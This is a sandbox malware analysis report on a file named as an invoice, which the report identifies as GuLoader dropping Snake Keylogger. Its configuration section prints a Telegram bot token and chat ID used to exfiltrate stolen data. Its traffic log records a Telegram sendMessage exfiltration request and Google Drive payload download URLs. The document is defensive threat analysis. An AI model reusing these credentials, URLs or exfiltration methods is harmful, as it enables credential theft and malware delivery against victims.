Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Factura Honorarios 2024-11-17.exe

Overview

General Information

Sample name:Factura Honorarios 2024-11-17.exe
Analysis ID:1557624
MD5:2494d7b2fd14dc5604fd6aa412f170fc
SHA1:dc2b1e324c49c9f0fa446211ed24841c48371ef0
SHA256:0cf14ff76c5d927ad6de94e8d632592a776adb36c733680fcf6385a5d1fed069
Tags:exeuser-TeamDreier
Infos:

Detection

GuLoader, Snake Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected GuLoader
Yara detected Snake Keylogger
Yara detected Telegram RAT
AI detected suspicious sample
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: Snake Keylogger

{"Exfil Mode": "Telegram", "Token": "7807279596:AAEZM1QwkCh738-y0Qmnc3ubaoLMl6bUCVw", "Chat_id": "7267131103", "Version": "4.4"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000002.2683988576.0000000035F51000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
    00000000.00000002.1873262256.0000000006B16000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
      Process Memory Space: Factura Honorarios 2024-11-17.exe PID: 7628JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        Process Memory Space: Factura Honorarios 2024-11-17.exe PID: 7628JoeSecurity_TelegramRATYara detected Telegram RATJoe Security

          Sigma Signatures

          No Sigma rule has matched

          Suricata Signatures

          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-18T13:50:59.975414+010028033053Unknown Traffic192.168.2.849715188.114.97.3443TCP
          2024-11-18T13:51:13.473984+010028033053Unknown Traffic192.168.2.849729188.114.97.3443TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-18T13:50:55.714204+010028032742Potentially Bad Traffic192.168.2.849711193.122.6.16880TCP
          2024-11-18T13:50:59.229900+010028032742Potentially Bad Traffic192.168.2.849711193.122.6.16880TCP
          2024-11-18T13:51:00.870450+010028032742Potentially Bad Traffic192.168.2.849716193.122.6.16880TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-18T13:50:47.489752+010028032702Potentially Bad Traffic192.168.2.849709142.250.185.174443TCP

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Found malware configuration
          Source: 00000003.00000002.2683988576.0000000035F51000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Token": "7807279596:AAEZM1QwkCh738-y0Qmnc3ubaoLMl6bUCVw", "Chat_id": "7267131103", "Version": "4.4"}
          Multi AV Scanner detection for submitted file
          Source: Factura Honorarios 2024-11-17.exeReversingLabs: Detection: 31%
          AI detected suspicious sample
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability

          Location Tracking

          barindex
          Tries to detect the country of the analysis system (by using the IP)
          Source: unknownDNS query: name: reallyfreegeoip.org
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_391787A8 CryptUnprotectData,3_2_391787A8
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_39178EF1 CryptUnprotectData,3_2_39178EF1
          Source: Factura Honorarios 2024-11-17.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49714 version: TLS 1.0
          Source: unknownHTTPS traffic detected: 142.250.185.174:443 -> 192.168.2.8:49709 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 172.217.16.193:443 -> 192.168.2.8:49710 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49730 version: TLS 1.2
          Source: Factura Honorarios 2024-11-17.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 0_2_004065C7 FindFirstFileW,FindClose,0_2_004065C7
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 0_2_00405996 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405996
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 0_2_00402868 FindFirstFileW,0_2_00402868
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_00402868 FindFirstFileW,3_2_00402868
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_004065C7 FindFirstFileW,FindClose,3_2_004065C7
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_00405996 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,3_2_00405996
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 4x nop then jmp 0015F45Dh3_2_0015F2C0
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 4x nop then jmp 0015F45Dh3_2_0015F4AC
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 4x nop then jmp 0015F45Dh3_2_0015F52F
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 4x nop then jmp 0015FC19h3_2_0015F974
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 4x nop then jmp 38F831E0h3_2_38F82DC8
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 4x nop then jmp 38F82C19h3_2_38F82968
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 4x nop then jmp 38F8E501h3_2_38F8E258
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 4x nop then jmp 38F8D3A1h3_2_38F8D0F8
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 4x nop then jmp 38F8CF49h3_2_38F8CCA0
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h3_2_38F80040
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 4x nop then jmp 38F8FAB9h3_2_38F8F810
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 4x nop then jmp 38F831E0h3_2_38F82DC4
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 4x nop then jmp 38F8DC51h3_2_38F8D9A8
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 4x nop then jmp 38F8D7F9h3_2_38F8D550
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 4x nop then jmp 38F831E0h3_2_38F8310E
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 4x nop then jmp 38F8E959h3_2_38F8E6B0
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 4x nop then jmp 38F8E0A9h3_2_38F8DE00
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 4x nop then jmp 38F8F661h3_2_38F8F3B8
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 4x nop then jmp 38F8F209h3_2_38F8EF60
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 4x nop then jmp 38F80D0Dh3_2_38F80B30
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 4x nop then jmp 38F81697h3_2_38F80B30
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 4x nop then jmp 38F8EDB1h3_2_38F8EB08
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 4x nop then jmp 391779C9h3_2_39177720
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 4x nop then jmp 39177EB5h3_2_39177B78
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 4x nop then jmp 39179280h3_2_39178FB0
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 4x nop then jmp 3917C826h3_2_3917C558
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 4x nop then jmp 3917E816h3_2_3917E548
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 4x nop then jmp 39170FF1h3_2_39170D48
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 4x nop then jmp 39171449h3_2_391711A0
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 4x nop then jmp 3917ECA6h3_2_3917E9D8
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 4x nop then jmp 391718A1h3_2_391715F8
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 4x nop then jmp 3917CCB6h3_2_3917C9E8
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 4x nop then jmp 391762D9h3_2_39176030
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 4x nop then jmp 3917BF06h3_2_3917BC38
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 4x nop then jmp 3917DEF6h3_2_3917DC28
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 4x nop then jmp 391702E9h3_2_39170040
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 4x nop then jmp 39173709h3_2_39173460
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 4x nop then jmp 39170741h3_2_39170498
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 4x nop then mov esp, ebp3_2_3917B081
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 4x nop then jmp 391732B1h3_2_3917308F
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 4x nop then jmp 39176733h3_2_39176488
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 4x nop then jmp 3917E386h3_2_3917E0B8
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 4x nop then jmp 3917C396h3_2_3917C0C8
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 4x nop then jmp 39170B99h3_2_391708F0
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 4x nop then jmp 3917B5E6h3_2_3917B318
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 4x nop then jmp 391725A9h3_2_39172300
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 4x nop then jmp 3917D5D6h3_2_3917D308
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 4x nop then jmp 391755D1h3_2_39175328
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 4x nop then jmp 39172A01h3_2_39172758
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 4x nop then jmp 3917DA66h3_2_3917D798
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 4x nop then jmp 39175A29h3_2_39175780
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 4x nop then jmp 3917FA56h3_2_3917F788
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 4x nop then jmp 39172E59h3_2_39172BB0
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 4x nop then jmp 3917BA76h3_2_3917B7A8
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 4x nop then jmp 39175E81h3_2_39175BD8
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 4x nop then jmp 39176CC1h3_2_39176A18
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 4x nop then jmp 391748C9h3_2_39174620
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 4x nop then jmp 39171CF9h3_2_39171A50
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 4x nop then jmp 39177119h3_2_39176E70
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 4x nop then jmp 3917D146h3_2_3917CE78
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 4x nop then jmp 39174D21h3_2_39174A78
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 4x nop then jmp 3917F136h3_2_3917EE68
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 4x nop then jmp 39172151h3_2_39171EA8
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 4x nop then jmp 39175179h3_2_39174ED0
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 4x nop then jmp 39177571h3_2_391772C8
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 4x nop then jmp 3917F5C6h3_2_3917F2F8
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 4x nop then jmp 391E6970h3_2_391E6678
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 4x nop then jmp 391E1E47h3_2_391E1BA0
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 4x nop then jmp 391E6347h3_2_391E5FD8
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 4x nop then jmp 391ECDD8h3_2_391ECAE0
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 4x nop then jmp 391E2BE6h3_2_391E2918
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 4x nop then jmp 391EC910h3_2_391EC618
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 4x nop then jmp 391E19DEh3_2_391E1710
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 4x nop then jmp 391E9E08h3_2_391E9B10
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 4x nop then jmp 391E4BD7h3_2_391E4908
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 4x nop then jmp 391E7300h3_2_391E7008
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 4x nop then jmp 391EE0F8h3_2_391EDE00
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 4x nop then jmp 391E3506h3_2_391E3238
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 4x nop then jmp 391EDC30h3_2_391ED938
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 4x nop then jmp 391EB128h3_2_391EAE30
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 4x nop then jmp 391E54F6h3_2_391E5228
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 4x nop then jmp 391E8620h3_2_391E8328
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 4x nop then jmp 391EF418h3_2_391EF120
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 4x nop then jmp 391E3E26h3_2_391E3B58
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 4x nop then jmp 391EEF50h3_2_391EEC58
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 4x nop then jmp 391EC448h3_2_391EC150
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 4x nop then jmp 391E5E16h3_2_391E5B48
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 4x nop then jmp 391E9940h3_2_391E9648
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 4x nop then jmp 391E030Eh3_2_391E0040
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 4x nop then jmp 391E6E38h3_2_391E6B40
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 4x nop then jmp 391E4746h3_2_391E4478
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 4x nop then jmp 391ED768h3_2_391ED470
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 4x nop then jmp 391EAC60h3_2_391EA968
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 4x nop then jmp 391E0C2Eh3_2_391E0960
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 4x nop then jmp 391E8158h3_2_391E7E60
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 4x nop then jmp 391E5066h3_2_391E4D98
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 4x nop then jmp 391E7C90h3_2_391E7998
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 4x nop then jmp 391EEA88h3_2_391EE790
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 4x nop then jmp 391E2756h3_2_391E2488
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 4x nop then jmp 391EBF80h3_2_391EBC88
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 4x nop then jmp 391E154Eh3_2_391E1280
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 4x nop then jmp 391E9478h3_2_391E9180
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 4x nop then jmp 391E5986h3_2_391E56B8
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 4x nop then jmp 391E8FB0h3_2_391E8CB8
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 4x nop then jmp 391EFDA8h3_2_391EFAB0
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 4x nop then jmp 391E3076h3_2_391E2DA8
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 4x nop then jmp 391ED2A0h3_2_391ECFA8
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 4x nop then jmp 391EA798h3_2_391EA4A0
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 4x nop then jmp 391EA2D0h3_2_391E9FD8
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 4x nop then jmp 391E079Eh3_2_391E04D0
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 4x nop then jmp 391E77C8h3_2_391E74D0
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 4x nop then jmp 391E3996h3_2_391E36C8
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 4x nop then jmp 391EE5C0h3_2_391EE2C8
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 4x nop then jmp 391EBAB8h3_2_391EB7C0
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 4x nop then jmp 391E22C6h3_2_391E1FF8
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 4x nop then jmp 391EB5F0h3_2_391EB2F8
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 4x nop then jmp 391E10BEh3_2_391E0DF0
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 4x nop then jmp 391E8AE8h3_2_391E87F0
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 4x nop then jmp 391E42B6h3_2_391E3FE8
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 4x nop then jmp 391EF8E0h3_2_391EF5E8
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 4x nop then jmp 39211FE8h3_2_39211CF0
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 4x nop then jmp 39210801h3_2_39210508
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 4x nop then jmp 39211658h3_2_39211360
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 4x nop then jmp 39210CC8h3_2_392109D0
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 4x nop then jmp 39211B20h3_2_39211828
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 4x nop then jmp 39210338h3_2_39210040
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 4x nop then jmp 39211190h3_2_39210E98
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]3_2_39393E70
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]3_2_39393E60
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]3_2_393909E1
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]3_2_39390A10
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]3_2_39390D26

          Networking

          barindex
          Uses the Telegram API (likely for C&C communication)
          Source: unknownDNS query: name: api.telegram.org
          Source: global trafficHTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:128757%0D%0ADate%20and%20Time:%2019/11/2024%20/%2002:39:03%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20128757%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
          Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
          Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
          Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
          Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
          Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
          Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
          Source: unknownDNS query: name: checkip.dyndns.org
          Source: unknownDNS query: name: reallyfreegeoip.org
          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49716 -> 193.122.6.168:80
          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49711 -> 193.122.6.168:80
          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49729 -> 188.114.97.3:443
          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49715 -> 188.114.97.3:443
          Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.8:49709 -> 142.250.185.174:443
          Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1bbtw8IuHzdajTlKnTAka4q-kS3ZmOLUO HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /download?id=1bbtw8IuHzdajTlKnTAka4q-kS3ZmOLUO&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
